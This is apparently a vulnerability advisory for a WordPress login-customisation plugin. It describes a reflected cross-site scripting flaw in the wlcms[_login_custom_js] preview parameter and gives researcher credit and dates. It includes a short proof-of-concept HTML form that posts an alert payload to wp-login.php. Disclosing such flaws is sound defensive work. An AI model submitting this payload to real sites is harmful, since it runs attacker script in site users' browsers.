The plugin does not sanitise and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing, leading to a Reflected Cross-Site Scripting issue
In v < 2.2.8, both unauthenticated and authenticated users can be attacked with it. In 2.2.8, it will only trigger against authenticated user <html> <body> <form action="https://example.com/wp-login.php?wlcms-action=preview" method="POST"> <input type="text" value='alert(/XSS/);' name="wlcms[_login_custom_js]" /> <input type="submit" value="Exploit me pls" /> </form> </body> </html>
Krzysztof Zając
Krzysztof Zając
Yes
2022-02-07 (about 11 months ago)
2022-02-07 (about 11 months ago)
2022-04-13 (about 9 months ago)